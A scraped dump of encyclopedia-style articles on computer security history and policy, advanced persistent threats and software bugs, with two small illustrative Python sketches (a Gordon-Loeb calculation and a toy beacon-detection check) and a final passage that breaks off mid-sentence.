Other telecommunication developments involving digital security include mobile signatures, which use the embedded SIM card to generate a legally binding electronic signature. Serious financial damage has been caused by security breaches, but because there is no standard model for estimating the cost of an incident, the only data available is that which is made public by the organizations involved. "Several computer security consulting firms produce estimates of total worldwide losses attributable to virus and worm attacks and to hostile digital acts in general. The 2003 loss estimates by these firms range from $13 billion (worms and viruses only) to $226 billion (for all forms of covert attacks). The reliability of these estimates is often challenged; the underlying methodology is basically anecdotal." 185 However, reasonable estimates of the financial cost of security breaches can actually help organizations make rational investment decisions. According to the classic Gordon-Loeb Model analyzing the optimal investment level in information security, one can conclude that the amount a firm spends to protect information should generally be only a small fraction of the expected loss (i.e., the expected value of the loss resulting from a cyber information security breach). 186 (A small numeric sketch of this result appears after this paragraph.) As with physical security, the motivations for breaches of computer security vary between attackers. Some are thrill-seekers or vandals, some are activists, others are criminals looking for financial gain. State-sponsored attackers are now common and well resourced but started with amateurs such as Markus Hess who hacked for the KGB, as recounted by Clifford Stoll in The Cuckoo's Egg. Attackers' motivations can vary for all types of attacks, from pleasure to political goals. 15 For example, "hacktivists" may target a company or organization that carries out activities they do not agree with, aiming to create bad publicity for the company by having its website crash. High-capability hackers, often with larger backing or state sponsorship, may attack based on the demands of their financial backers, and their attacks are more likely to involve serious compromises. An example of a more serious attack was the 2015 Ukraine power grid hack, which reportedly utilised spear-phishing, destruction of files, and denial-of-service attacks to carry out the full attack. 187 188 Additionally, recent attacker motivations can be traced back to extremist organizations seeking to gain political advantage or disrupt social agendas. 189 The growth of the internet, mobile technologies, and inexpensive computing devices has led to a rise in capabilities but also to greater risk to environments that are deemed vital to operations. All critical targeted environments are susceptible to compromise, and this has led to a series of proactive studies on how to mitigate the risk by taking into consideration the motivations of these types of actors. Several stark differences exist between the hacker motivation and that of nation-state actors seeking to attack based on an ideological preference. 190 A key aspect of threat modeling for any system is identifying the motivations behind potential attacks and the individuals or groups likely to carry them out. The level and detail of security measures will differ based on the specific system being protected. For instance, a home personal computer, a bank, and a classified military network each face distinct threats, despite using similar underlying technologies.
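As promised above, here is a rough numeric sketch of the Gordon-Loeb idea in Python. The threat probability, vulnerability and loss figures are invented for illustration; the model's widely cited result is that the optimal security spend never exceeds roughly 1/e (about 37%) of the expected loss.

import math

# Illustrative inputs (invented): chance a threat occurs, chance it succeeds if it
# does (vulnerability), and the monetary loss if it succeeds.
threat_probability = 0.10
vulnerability = 0.50
potential_loss = 2_000_000  # dollars

expected_loss = threat_probability * vulnerability * potential_loss
spending_cap = expected_loss / math.e  # Gordon-Loeb upper bound (~37% of expected loss)

print(f"Expected loss:           ${expected_loss:,.0f}")
print(f"Upper bound on spending: ${spending_cap:,.0f}")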
191 Computer security incident management is an organized approach to addressing and managing the aftermath of a computer security incident or compromise with the goal of preventing a breach or thwarting a cyberattack. An incident that is not identified and managed at the time of intrusion typically escalates to a more damaging event such as a data breach or system failure. The intended outcome of a computer security incident response plan is to contain the incident, limit damage and assist recovery to business as usual. Responding to compromises quickly can mitigate exploited vulnerabilities, restore services and processes and minimize losses. 192 Incident response planning allows an organization to establish a series of best practices to stop an intrusion before it causes damage. Typical incident response plans contain a set of written instructions that outline the organization's response to a cyberattack. Without a documented plan in place, an organization may not successfully detect an intrusion or compromise and stakeholders may not understand their roles, processes and procedures during an escalation, slowing the organization's response and resolution. There are four key components of a computer security incident response plan: Some illustrative examples of different types of computer security breaches are given below. In 1988, 60,000 computers were connected to the Internet, and most were mainframes, minicomputers and professional workstations. On 2 November 1988, many started to slow down, because they were running a malicious code that demanded processor time and that spread itself to other computers the first internet computer worm. 194 The software was traced back to 23 year-old Cornell University graduate student Robert Tappan Morris who said "he wanted to count how many machines were connected to the Internet". 194 In 1994, over a hundred intrusions were made by unidentified crackers into the Rome Laboratory, the US Air Force's main command and research facility. Using trojan horses, hackers were able to obtain unrestricted access to Rome's networking systems and remove traces of their activities. The intruders were able to obtain classified files, such as air tasking order systems data and furthermore able to penetrate connected networks of National Aeronautics and Space Administration's Goddard Space Flight Center, Wright-Patterson Air Force Base, some Defense contractors, and other private sector organizations, by posing as a trusted Rome center user. 195 In early 2007, American apparel and home goods company TJX announced that it was the victim of an unauthorized computer systems intrusion 196 and that the hackers had accessed a system that stored data on credit card, debit card, check, and merchandise return transactions. 197 In 2010, the computer worm known as Stuxnet reportedly ruined almost one-fifth of Iran's nuclear centrifuges. 198 It did so by disrupting industrial programmable logic controllers (PLCs) in a targeted attack. This is generally believed to have been launched by Israel and the United States to disrupt Iran's nuclear program 199 200 201 202 although neither has publicly admitted this. In early 2013, documents provided by Edward Snowden were published by The Washington Post and The Guardian 203 204 exposing the massive scale of NSA global surveillance. There were also indications that the NSA may have inserted a backdoor in a NIST standard for encryption. 205 This standard was later withdrawn due to widespread criticism. 
206 The NSA was additionally revealed to have tapped the links between Google's data centers. 207 A Ukrainian hacker known as Rescator broke into Target Corporation computers in 2013, stealing roughly 40 million credit cards, 208 and then Home Depot computers in 2014, stealing between 53 and 56 million credit card numbers. 209 Warnings were delivered at both corporations, but were ignored; physical security breaches using self-checkout machines are believed to have played a large role. "The malware utilized is absolutely unsophisticated and uninteresting," says Jim Walter, director of threat intelligence operations at security technology company McAfee, meaning that the heists could have easily been stopped by existing antivirus software had administrators responded to the warnings. The size of the thefts has resulted in major attention from state and federal United States authorities, and the investigation is ongoing. In April 2015, the Office of Personnel Management discovered it had been hacked more than a year earlier in a data breach, resulting in the theft of approximately 21.5 million personnel records handled by the office. 210 The Office of Personnel Management hack has been described by federal officials as among the largest breaches of government data in the history of the United States. 211 Data targeted in the breach included personally identifiable information such as Social Security numbers, names, dates and places of birth, addresses, and fingerprints of current and former government employees as well as anyone who had undergone a government background check. 212 213 It is believed the hack was perpetrated by Chinese hackers. 214 In July 2015, a hacker group known as The Impact Team successfully breached the extramarital relationship website Ashley Madison, created by Avid Life Media. The group claimed that they had taken not only company data but user data as well. After the breach, The Impact Team dumped emails from the company's CEO to prove their point, and threatened to dump customer data unless the website was taken down permanently. 215 When Avid Life Media did not take the site offline, the group released two more compressed files, one 9.7GB and the second 20GB. After the second data dump, Avid Life Media CEO Noel Biderman resigned, but the website remained in operation. In June 2021, a cyber attack took down the largest fuel pipeline in the U.S. and led to shortages across the East Coast. 216 International legal issues of cyber attacks are complicated in nature. There is no global base of common rules to judge, and eventually punish, cybercrimes and cybercriminals - and where security firms or agencies do locate the cybercriminal behind the creation of a particular piece of malware or form of cyber attack, often the local authorities cannot take action due to lack of laws under which to prosecute. 217 218 Proving attribution for cybercrimes and cyberattacks is also a major problem for all law enforcement agencies. "Computer viruses switch from one country to another, from one jurisdiction to another moving around the world, using the fact that we don't have the capability to globally police operations like this. So the Internet is as if someone had given free plane tickets to all the online criminals of the world." 217 The use of techniques such as dynamic DNS, fast flux and bulletproof servers adds to the difficulty of investigation and enforcement.
The role of the government is to make regulations to force companies and organizations to protect their systems, infrastructure and information from any cyberattacks, but also to protect its own national infrastructure such as the national power grid. 219 The government's regulatory role in cyberspace is complicated. For some, cyberspace was seen as a virtual space that was to remain free of government intervention, as can be seen in many of today's libertarian blockchain and bitcoin discussions. 220 Many government officials and experts think that the government should do more and that there is a crucial need for improved regulation, mainly due to the failure of the private sector to solve the cybersecurity problem efficiently. R. Clarke said during a panel discussion at the RSA Security Conference in San Francisco that he believes the "industry only responds when you threaten regulation. If the industry doesn't respond (to the threat), you have to follow through." 221 On the other hand, executives from the private sector agree that improvements are necessary, but think that government intervention would affect their ability to innovate efficiently. Daniel R. McCarthy analyzed this public-private partnership in cybersecurity and reflected on the role of cybersecurity in the broader constitution of political order. 222 On 22 May 2020, the UN Security Council held its second-ever informal meeting on cybersecurity to focus on cyber challenges to international peace. According to UN Secretary-General António Guterres, new technologies are too often used to violate rights. 223 Many different teams and organizations exist, including: On 14 April 2016, the European Parliament and the Council of the European Union adopted the General Data Protection Regulation (GDPR). The GDPR, which came into force on 25 May 2018, grants individuals within the European Union (EU) and the European Economic Area (EEA) the right to the protection of personal data. The regulation requires that any entity that processes personal data incorporate data protection by design and by default. It also requires that certain organizations appoint a Data Protection Officer (DPO). Most countries have their own computer emergency response team to protect network security. Since 2010, Canada has had a cybersecurity strategy. 229 230 This functions as a counterpart document to the National Strategy and Action Plan for Critical Infrastructure. 231 The strategy has three main pillars: securing government systems, securing vital private cyber systems, and helping Canadians to be secure online. 230 231 There is also a Cyber Incident Management Framework to provide a coordinated response in the event of a cyber incident. 232 233 The Canadian Cyber Incident Response Centre (CCIRC) is responsible for mitigating and responding to threats to Canada's critical infrastructure and cyber systems. It provides support to mitigate cyber threats, technical support to respond to and recover from targeted cyber attacks, and provides online tools for members of Canada's critical infrastructure sectors. 234 It posts regular cybersecurity bulletins 235 and operates an online reporting tool where individuals and organizations can report a cyber incident. 236 To inform the general public on how to protect themselves online, Public Safety Canada has partnered with STOP.THINK.CONNECT, a coalition of non-profit, private sector, and government organizations, 237 and launched the Cyber Security Cooperation Program.
238 239 They also run the GetCyberSafe portal for Canadian citizens, and Cyber Security Awareness Month during October. 240 Public Safety Canada aims to begin an evaluation of Canada's cybersecurity strategy in early 2015. 231 Australian federal government announced an $18.2 million investment to fortify the cybersecurity resilience of small and medium enterprises (SMEs) and enhance their capabilities in responding to cyber threats. This financial backing is an integral component of the soon-to-be-unveiled 2023 2030 Australian Cyber Security Strategy, slated for release within the current week. A substantial allocation of $7.2 million is earmarked for the establishment of a voluntary cyber health check program, facilitating businesses in conducting a comprehensive and tailored self-assessment of their cybersecurity upskill. This avant-garde health assessment serves as a diagnostic tool, enabling enterprises to ascertain the robustness of Australia's cyber security regulations. Furthermore, it affords them access to a repository of educational resources and materials, fostering the acquisition of skills necessary for an elevated cybersecurity posture. This groundbreaking initiative was jointly disclosed by Minister for Cyber Security Clare O'Neil and Minister for Small Business Julie Collins. 241 Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000. 242 The National Cyber Security Policy 2013 is a policy framework by the Ministry of Electronics and Information Technology (MeitY) which aims to protect the public and private infrastructure from cyberattacks, and safeguard "information, such as personal information (of web users), financial and banking information and sovereign data". CERT- In is the nodal agency which monitors the cyber threats in the country. The post of National Cyber Security Coordinator has also been created in the Prime Minister's Office (PMO). The Indian Companies Act 2013 has also introduced cyber law and cybersecurity obligations on the part of Indian directors. Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000 Update in 2013. 243 Following cyberattacks in the first half of 2013, when the government, news media, television stations, and bank websites were compromised, the national government committed to the training of 5,000 new cybersecurity experts by 2017. The South Korean government blamed its northern counterpart for these attacks, as well as incidents that occurred in 2009, 2011, 244 and 2012, but Pyongyang denies the accusations. 245 The United States has its first fully formed cyber plan in 15 years, as a result of the release of this National Cyber plan. 246 In this policy, the US says it will: Protect the country by keeping networks, systems, functions, and data safe; Promote American wealth by building a strong digital economy and encouraging strong domestic innovation; Peace and safety should be kept by making it easier for the US to stop people from using computer tools for bad things, working with friends and partners to do this; and increase the United States' impact around the world to support the main ideas behind an open, safe, reliable, and compatible Internet. 247 The new U.S. cyber strategy 248 seeks to allay some of those concerns by promoting responsible behavior in cyberspace, urging nations to adhere to a set of norms, both through international law and voluntary standards. 
It also calls for specific measures to harden U.S. government networks from attacks, like the June 2015 intrusion into the U.S. Office of Personnel Management (OPM), which compromised the records of about 4.2 million current and former government employees. And the strategy calls for the U.S. to continue to name and shame bad cyber actors, calling them out publicly for attacks when possible, along with the use of economic sanctions and diplomatic pressure. 249 The Computer Fraud and Abuse Act of 1986, codified at 18 U.S.C. 1030, is the key legislation. It prohibits unauthorized access or damage of protected computers as defined in 18 U.S.C. 1030(e)(2). Although various other measures have been proposed, 250 251 none have succeeded. In 2013, Executive Order 13636, Improving Critical Infrastructure Cybersecurity, was signed, which prompted the creation of the NIST Cybersecurity Framework. In response to the Colonial Pipeline ransomware attack, 252 President Joe Biden signed Executive Order 14028 253 on May 12, 2021, to increase software security standards for sales to the government, tighten detection and security on existing systems, improve information sharing and training, establish a Cyber Safety Review Board, and improve incident response. The General Services Administration (GSA) has standardized the penetration test service as a pre-vetted support service, to rapidly address potential vulnerabilities and stop adversaries before they impact US federal, state and local governments. These services are commonly referred to as Highly Adaptive Cybersecurity Services (HACS). The Department of Homeland Security has a dedicated division responsible for the response system, risk management program and requirements for cybersecurity in the United States called the National Cyber Security Division. 254 255 The division is home to US-CERT operations and the National Cyber Alert System. 255 The National Cybersecurity and Communications Integration Center brings together government organizations responsible for protecting computer networks and networked infrastructure. 256 The third priority of the FBI is to "Protect the United States against cyber-based attacks and high-technology crimes", 257 and the FBI, along with the National White Collar Crime Center (NW3C) and the Bureau of Justice Assistance (BJA), is part of the multi-agency task force The Internet Crime Complaint Center, also known as IC3. 258 In addition to its own specific duties, the FBI participates alongside non-profit organizations such as InfraGard. 259 260 The Computer Crime and Intellectual Property Section (CCIPS) operates in the United States Department of Justice Criminal Division. The CCIPS is in charge of investigating computer crime and intellectual property crime and is specialized in the search and seizure of digital evidence in computers and networks. 261 In 2017, CCIPS published A Framework for a Vulnerability Disclosure Program for Online Systems to help organizations "clearly describe authorized vulnerability disclosure and discovery conduct, thereby substantially reducing the likelihood that such described activities will result in a civil or criminal violation of law under the Computer Fraud and Abuse Act (18 U.S.C. 1030)." 262 The United States Cyber Command, also known as USCYBERCOM, "has the mission to direct, synchronize, and coordinate cyberspace planning and operations to defend and advance national interests in collaboration with domestic and international partners."
263 It has no role in the protection of civilian networks. 264 265 The U.S. Federal Communications Commission's role in cybersecurity is to strengthen the protection of critical communications infrastructure, to assist in maintaining the reliability of networks during disasters, to aid in swift recovery afterwards, and to ensure that first responders have access to effective communications services. 266 The Food and Drug Administration has issued guidance for medical devices, 267 and the National Highway Traffic Safety Administration 268 is concerned with automotive cybersecurity. After being criticized by the Government Accountability Office, 269 and following successful attacks on airports and claimed attacks on airplanes, the Federal Aviation Administration has devoted funding to securing systems on board the planes of private manufacturers, and the Aircraft Communications Addressing and Reporting System. 270 Concerns have also been raised about the future Next Generation Air Transportation System. 271 The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry-recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report these certifications range from CompTIA's A+ and Security+ through ICS2.org's CISSP, etc. 272 Computer emergency response team is a name given to expert groups that handle computer security incidents. In the US, two distinct organizations exist, although they do work closely together. In the context of U.S. nuclear power plants, the U.S. Nuclear Regulatory Commission (NRC) outlines cybersecurity requirements under 10 CFR Part 73, specifically in 73.54. 274 The Nuclear Energy Institute's NEI 08-09 document, Cyber Security Plan for Nuclear Power Reactors, 275 outlines a comprehensive framework for cybersecurity in the nuclear power industry. Drafted with input from the U.S. NRC, this guideline is instrumental in aiding licensees to comply with the Code of Federal Regulations (CFR), which mandates robust protection of digital computers and equipment and communications systems at nuclear power plants against cyber threats. 276 There is growing concern that cyberspace will become the next theater of warfare. As Mark Clayton from The Christian Science Monitor wrote in a 2015 article titled "The New Cyber Arms Race": In the future, wars will not just be fought by soldiers with guns or with planes that drop bombs. They will also be fought with the click of a mouse half a world away that unleashes carefully weaponized computer programs that disrupt or destroy critical industries like utilities, transportation, communications, and energy. Such attacks could also disable military networks that control the movement of troops, the path of jet fighters, the command and control of warships. 277 This has led to new terms such as cyberwarfare and cyberterrorism. The United States Cyber Command was created in 2009 278 and many other countries have similar forces. There are a few critical voices that question whether cybersecurity is as significant a threat as it is made out to be. 279 280 281 Cybersecurity is a fast-growing field of IT concerned with reducing organizations' risk of hacks or data breaches.
282 According to research from the Enterprise Strategy Group, 46% of organizations say that they have a "problematic shortage" of cybersecurity skills in 2016, up from 28% in 2015. 283 Commercial, government and non-governmental organizations all employ cybersecurity professionals. The fastest increases in demand for cybersecurity workers are in industries managing increasing volumes of consumer data such as finance, health care, and retail. 284 However, the use of the term cybersecurity is more prevalent in government job descriptions. 285 Typical cybersecurity job titles and descriptions include: 286 Student programs are also available for people interested in beginning a career in cybersecurity. 290 291 Meanwhile, a flexible and effective option for information security professionals of all experience levels to keep studying is online security training, including webcasts. 292 293 A wide range of certified courses are also available. 294 In the United Kingdom, a nationwide set of cybersecurity forums, known as the U.K Cyber Security Forum, were established supported by the Government's cybersecurity strategy 295 in order to encourage start-ups and innovation and to address the skills gap 296 identified by the U.K Government. In Singapore, the Cyber Security Agency has issued a Singapore Operational Technology (OT) Cybersecurity Competency Framework (OTCCF). The framework defines emerging cybersecurity roles in Operational Technology. The OTCCF was endorsed by the Infocomm Media Development Authority (IMDA). It outlines the different OT cybersecurity job positions as well as the technical skills and core competencies necessary. It also depicts the many career paths available, including vertical and lateral advancement opportunities. 297 The following terms used with regards to computer security are explained below: Since the Internet's arrival and with the digital transformation initiated in recent years, the notion of cybersecurity has become a familiar subject in both our professional and personal lives. Cybersecurity and cyber threats have been consistently present for the last 60 years of technological change. In the 1970s and 1980s, computer security was mainly limited to academia until the conception of the Internet, where, with increased connectivity, computer viruses and network intrusions began to take off. After the spread of viruses in the 1990s, the 2000s marked the institutionalization of organized attacks such as distributed denial of service. 301 This led to the formalization of cybersecurity as a professional discipline. 302 The April 1967 session organized by Willis Ware at the Spring Joint Computer Conference, and the later publication of the Ware Report, were foundational moments in the history of the field of computer security. 303 Ware's work straddled the intersection of material, cultural, political, and social concerns. 303 A 1977 NIST publication 304 introduced the CIA triad of confidentiality, integrity, and availability as a clear and simple way to describe key security goals. 305 While still relevant, many more elaborate frameworks have since been proposed. 306 307 However, in the 1970s and 1980s, there were no grave computer threats because computers and the internet were still developing, and security threats were easily identifiable. More often, threats came from malicious insiders who gained unauthorized access to sensitive documents and files. Although malware and network breaches existed during the early years, they did not use them for financial gain. 
By the second half of the 1970s, established computer firms like IBM started offering commercial access control systems and computer security software products. 308 One of the earliest examples of an attack on a computer network was the computer worm Creeper, written by Bob Thomas at BBN, which propagated through the ARPANET in 1971. 309 The program was purely experimental in nature and carried no malicious payload. A later program, Reaper, was created by Ray Tomlinson in 1972 and used to destroy Creeper. Between September 1986 and June 1987, a group of German hackers performed the first documented case of cyber espionage. 310 The group hacked into American defense contractors, universities, and military base networks and sold gathered information to the Soviet KGB. The group was led by Markus Hess, who was arrested on 29 June 1987. He was convicted of espionage (along with two co-conspirators) on 15 February 1990. In 1988, one of the first computer worms, called the Morris worm, was distributed via the Internet. It gained significant mainstream media attention. 311 In 1993, Netscape started developing the SSL protocol, shortly after the National Center for Supercomputing Applications (NCSA) launched Mosaic 1.0, one of the first popular web browsers. 312 Netscape had SSL version 1.0 ready in 1994, but it was never released to the public due to many serious security vulnerabilities. These weaknesses included replay attacks and a vulnerability that allowed hackers to alter unencrypted communications sent by users. However, in February 1995, Netscape launched Version 2.0. 313 The National Security Agency (NSA) is responsible for the protection of U.S. information systems and also for collecting foreign intelligence. 314 The agency analyzes commonly used software and system configurations to find security flaws, which it can use for offensive purposes against competitors of the United States. 315 NSA contractors created and sold click-and-shoot attack tools to US agencies and close allies, but eventually, the tools made their way to foreign adversaries. In 2016, the NSA's own hacking tools were hacked, and they have been used by Russia and North Korea. The NSA's employees and contractors have been recruited at high salaries by adversaries, anxious to compete in cyberwarfare. In 2007, the United States and Israel began exploiting security flaws in the Microsoft Windows operating system to attack and damage equipment used in Iran to refine nuclear materials. Iran responded by heavily investing in its own cyberwarfare capability, which it began using against the United States. 315 |
345 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Advanced_persistent_threat | An advanced persistent threat (APT) is a stealthy threat actor, typically a state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. 1 2 In recent times, the term may also refer to non-state-sponsored groups conducting large-scale targeted intrusions for specific goals. 3 Such threat actors' motivations are typically political or economic. 4 Every major business sector has recorded instances of cyberattacks by advanced actors with specific goals, whether to steal, spy, or disrupt. These targeted sectors include government, defense, financial services, legal services, industrial, telecoms, consumer goods and many more. 5 6 7 Some groups utilize traditional espionage vectors, including social engineering, human intelligence and infiltration to gain access to a physical location to enable network attacks. The purpose of these attacks is to install custom malware (malicious software). 8 APT attacks on mobile devices have also become a legitimate concern, since attackers are able to penetrate into cloud and mobile infrastructure to eavesdrop, steal, and tamper with data. 9 The median "dwell-time", the time an APT attack goes undetected, differs widely between regions. FireEye reported the mean dwell-time for 2018 in the Americas as 71 days, EMEA as 177 days, and APAC as 204 days. 5 Such a long dwell-time allows attackers a significant amount of time to go through the attack cycle, propagate, and achieve their objectives. Definitions of precisely what an APT is can vary, but can be summarized by their named requirements below: Warnings against targeted, socially-engineered emails dropping trojans to exfiltrate sensitive information were published by UK and US CERT organisations in 2005. This method was used throughout the early 1990s and does not in itself constitute an APT. The term "advanced persistent threat" has been cited as originating from the United States Air Force in 2006 13 with Colonel Greg Rattray cited as the individual who coined the term. 14 The Stuxnet computer worm, which targeted the computer hardware of Iran's nuclear program, is one example of an APT attack. In this case, the Iranian government might consider the Stuxnet creators to be an advanced persistent threat. citation needed 15 Within the computer security community, and increasingly within the media, the term is almost always used in reference to a long-term pattern of sophisticated computer network exploitation aimed at governments, companies, and political activists, and by extension, also to ascribe the A, P and T attributes to the groups behind these attacks. 16 Advanced persistent threat (APT) as a term may be shifting focus to computer-based hacking due to the rising number of occurrences. PC World reported an 81 percent increase from 2010 to 2011 of particularly advanced targeted computer attacks. 17 Actors in many countries have used cyberspace as a means to gather intelligence on individuals and groups of individuals of interest. 18 19 20 The United States Cyber Command is tasked with coordinating the US military's offensive and defensive cyber operations. 21 Numerous sources have alleged that some APT groups are affiliated with, or are agents of, governments of sovereign states. 
22 23 24 Businesses holding a large quantity of personally identifiable information are at high risk of being targeted by advanced persistent threats, including: 25 A Bell Canada study provided deep research into the anatomy of APTs and uncovered widespread presence in Canadian government and critical infrastructure. Attribution was established to Chinese and Russian actors. 28 Actors behind advanced persistent threats create a growing and changing risk to organizations' financial assets, intellectual property, and reputation 29 by following a continuous process or kill chain: The global landscape of APTs from all sources is sometimes referred to in the singular as "the" APT, as are references to the actor behind a specific incident or series of incidents, but the definition of APT includes both actor and method. 30 In 2013, Mandiant presented results of their research on alleged Chinese attacks using the APT method between 2004 and 2013 31 that followed a similar lifecycle: In incidents analysed by Mandiant, the average period over which the attackers controlled the victim's network was one year, with the longest lasting almost five years. 31 The infiltrations were allegedly performed by the Shanghai-based Unit 61398 of the People's Liberation Army. Chinese officials have denied any involvement in these attacks. 33 Earlier reports from Secdev had already discovered and implicated Chinese actors. 34 There are tens of millions of malware variations, 35 which makes it extremely challenging to protect organizations from APTs. While APT activities are stealthy and hard to detect, the command and control network traffic associated with APTs can be detected at the network layer level with sophisticated methods (a toy illustration of this kind of log-based detection appears after this paragraph). Deep log analyses and log correlation from various sources are of limited usefulness in detecting APT activities, and it is challenging to separate noise from legitimate traffic. Traditional security technology and methods have been ineffective in detecting or mitigating APTs. 36 Active cyber defense has yielded greater efficacy in detecting and prosecuting APTs (find, fix, finish) when applying cyber threat intelligence to hunting and adversary-pursuit activities. 37 38 Human-Introduced Cyber Vulnerabilities (HICV) are a weak cyber link that are neither well understood nor mitigated, constituting a significant attack vector. 39 Since Xi Jinping became General Secretary of the Chinese Communist Party in 2012, the Ministry of State Security has gained more responsibility over cyberespionage vis-à-vis the People's Liberation Army, and currently oversees various APT groups. 40 According to security researcher Timo Steffens, "the APT landscape in China is run in a 'whole country' approach, leveraging skills from universities, individual, and private and public sectors". 41 Multiple organizations may assign different names to the same actor. As separate researchers could each have their own varying assessments of an APT group, companies such as CrowdStrike, Kaspersky, Mandiant, and Microsoft, among others, have their own internal naming schemes. 77 Names between different organizations may refer to overlapping but ultimately different groups, based on various data gathered. CrowdStrike assigns animals by nation-state or other category, such as "Kitten" for Iran and "Spider" for groups focused on cybercrime. 78 Other companies have named groups based on this system — Rampant Kitten, for instance, was named by Check Point rather than CrowdStrike. 79 Dragos bases its names for APT groups on minerals.
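As a toy illustration of the log correlation mentioned above, the Python sketch below flags hosts whose outbound connections to a destination recur at suspiciously regular intervals, one crude signature of command-and-control beaconing. The log format, hostnames and threshold are invented, and real detection pipelines are far more sophisticated.

from collections import defaultdict
from statistics import mean, pstdev

# Hypothetical connection log: (timestamp_seconds, source_host, destination)
conn_log = [
    (0, "ws-17", "203.0.113.9"), (300, "ws-17", "203.0.113.9"),
    (600, "ws-17", "203.0.113.9"), (900, "ws-17", "203.0.113.9"),
    (12, "ws-04", "198.51.100.2"), (845, "ws-04", "198.51.100.2"),
]

def beacon_candidates(log, max_jitter=10.0, min_connections=4):
    """Flag (host, destination) pairs whose inter-connection gaps are nearly constant."""
    by_pair = defaultdict(list)
    for ts, src, dst in log:
        by_pair[(src, dst)].append(ts)
    suspects = []
    for pair, times in by_pair.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(times) >= min_connections and pstdev(gaps) <= max_jitter:
            suspects.append((pair, mean(gaps)))
    return suspects

print(beacon_candidates(conn_log))  # ws-17 contacts 203.0.113.9 every ~300 seconds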
77 Mandiant assigns numbered acronyms in three categories, APT, FIN, and UNC, resulting in APT names like FIN7. Other companies using a similar system include Proofpoint (TA) and IBM (ITG and Hive). 77 Microsoft used to assign names from the periodic table, often stylized in all-caps (e.g. POTASSIUM); in April 2023, Microsoft changed its naming schema to use weather-based names (e.g. Volt Typhoon). 80 |
346 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:CreateAccount&returnto=Data+scraping | edits articles recent contributors |
347 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:RecentChanges | This is a list of recent changes to Wikipedia. |
348 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Software_bug | A software bug is an error, flaw, or defect in computer software that causes it to produce an incorrect or unexpected result or to behave in unintended ways. A computer program with many or serious bugs may be described as buggy. The effects of a software bug range from minor (such as a misspelled word in the user interface) to severe (such as frequent crashing). Software bugs have been linked to disasters. Software bugs in the Therac-25 radiation therapy machine were directly responsible for patient deaths in the 1980s. In 1996, the European Space Agency's US$1 billion prototype Ariane 5 rocket was destroyed less than a minute after launch due to a bug in the on-board guidance computer program. 1 In 1994, an RAF Chinook helicopter crashed, killing 29; the crash was initially blamed on pilot error, but was later thought to have been caused by a software bug in the engine-control computer. 2 Buggy software caused the early 21st-century British Post Office scandal. 3 In 2002, a study commissioned by the US Department of Commerce's National Institute of Standards and Technology concluded that "software bugs, or errors, are so prevalent and so detrimental that they cost the US economy an estimated $59 billion annually, or about 0.6 percent of the gross domestic product". 4 Since the 1950s, some computer systems have been designed to detect or auto-correct various software errors during operations. Mistake metamorphism (from Greek meta "change", morph "form") refers to the evolution of a defect in the final stage of software deployment. Transformation of a "mistake" committed by an analyst in the early stages of the software development lifecycle, which leads to a "defect" in the final stage of the cycle, has been called 'mistake metamorphism'. 5 Different stages of a mistake in the development cycle may be described as mistake, 6 : 31 anomaly, 6 : 10 fault, 6 : 31 failure, 6 : 31 error, 6 : 31 exception, 6 : 31 crash, 6 : 22 glitch, bug, 6 : 14 defect, incident, 6 : 39 or side effect. Sometimes the use of bug to describe the behavior of software is contentious due to perception. Some suggest that the term should be abandoned and replaced with defect or error. Some contend that bug implies that the defect arose on its own and push to use defect instead, since it more clearly connotes that the defect was caused by a human. 7 Some contend that bug may be used to cover up an intentional design decision. In 2011, after receiving scrutiny from US Senator Al Franken for recording and storing users' locations in unencrypted files, 8 Apple called the behavior a bug. However, Justin Brookman of the Center for Democracy and Technology directly challenged that portrayal, stating "I'm glad that they are fixing what they call bugs, but I take exception with their strong denial that they track users." 9 Preventing bugs as early as possible in the software development process is a target of investment and innovation. 10 11 Newer programming languages tend to be designed to prevent common bugs based on vulnerabilities of existing languages. Lessons learned from older languages such as BASIC and C are used to inform the design of later languages such as C# and Rust. Languages may include features such as a static type system, restricted namespaces and modular programming. For example, in a typed, compiled language (like C), assigning a string literal to a float variable is syntactically correct but fails type checking, since the right side, a string, cannot be assigned to a float variable. Compilation fails, forcing this defect to be fixed before development progress can resume.
With an interpreted language, a failure would not occur until later at runtime. Some languages exclude features that easily lead to bugs, at the expense of slower performance, the principle being that it is usually better to write simpler, slower correct code than complicated, buggy code. For example, Java does not support pointer arithmetic, which is generally fast but is considered dangerous because it makes it relatively easy to cause a major bug. Some languages include features that add runtime overhead in order to prevent some bugs. For example, many languages include runtime bounds checking and a way to handle out-of-bounds conditions instead of crashing. A compiled language allows for detecting some typos (such as a misspelled identifier) before runtime, which is earlier in the software development process than for an interpreted language. Programming techniques such as programming style and defensive programming are intended to prevent typos. For example, a bug may be caused by a relatively minor, typographical error (typo) in the code: code such as if (condition) foo(); executes function foo only if condition is true, but the version with a stray semicolon, if (condition); foo();, always executes foo. A convention that tends to prevent this particular issue is to require braces for a block even if it has just one line. Enforcement of conventions may be manual (i.e. via code review) or via automated tools. Some contend that writing a program specification, which states the behavior of a program, can prevent bugs. Some contend that formal specifications are impractical for anything but the shortest programs, because of problems of combinatorial explosion and indeterminacy. One goal of software testing is to find bugs. Measurements during testing can provide an estimate of the number of likely bugs remaining; this becomes more reliable the longer a product is tested and developed. Agile software development may involve frequent software releases with relatively small changes. Defects are revealed by user feedback. With test-driven development (TDD), unit tests are written while writing the production code, and the production code is not considered complete until all tests complete successfully. Tools for static code analysis help developers by inspecting the program text beyond the compiler's capabilities to spot potential problems. Although in general the problem of finding all programming errors given a specification is not solvable (see halting problem), these tools exploit the fact that human programmers tend to make certain kinds of simple mistakes often when writing software. Tools to monitor the performance of the software as it is running, either specifically to find problems such as bottlenecks or to give assurance as to correct working, may be embedded in the code explicitly (perhaps as simple as a statement saying PRINT "I AM HERE"), or provided as tools. It is often a 